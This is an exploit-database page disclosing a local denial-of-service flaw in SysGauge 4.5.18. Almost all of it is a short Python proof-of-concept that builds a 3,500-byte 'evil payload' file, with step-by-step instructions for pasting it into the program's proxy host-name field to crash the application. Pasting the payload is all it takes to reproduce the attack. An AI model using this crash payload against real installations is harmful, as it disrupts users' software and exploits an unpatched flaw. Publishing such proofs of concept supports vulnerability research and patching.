SysGauge 4.5.18 Denial Of Service

2018.03.29
Credit: Hashim Jawad
Risk: Medium
Local: Yes
Remote: No
CVE: N/A
CWE: N/A

#!/usr/bin/python ############################################################################################ # Exploit Title : SysGauge v4.5.18 - Local Denial of Service # # Exploit Author : Hashim Jawad # # Twitter : @ihack4falafel # # Author Website : ihack4falafel[.]com # # Vendor Homepage : http://www.sysgauge.com/ # # Vulnerable Software : http://www.sysgauge.com/setups/sysgauge_setup_v4.5.18.exe # # Note : SysGauge Pro and Ultimate v4.5.18 are also vulnerable # # Steps to Reproduce : ~ Copy content of payload.txt # # ~ Select Manual proxy configuration under Options->Proxy # # ~ Paste content in 'Proxy Server Host Name' field and click Save # ############################################################################################ buffer = "A" * 3500 try: f=open("payload.txt","w") print "[+] Creating %s bytes evil payload.." %len(buffer) f.write(buffer) f.close() print "[+] File created!" except: print "File cannot be created"


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top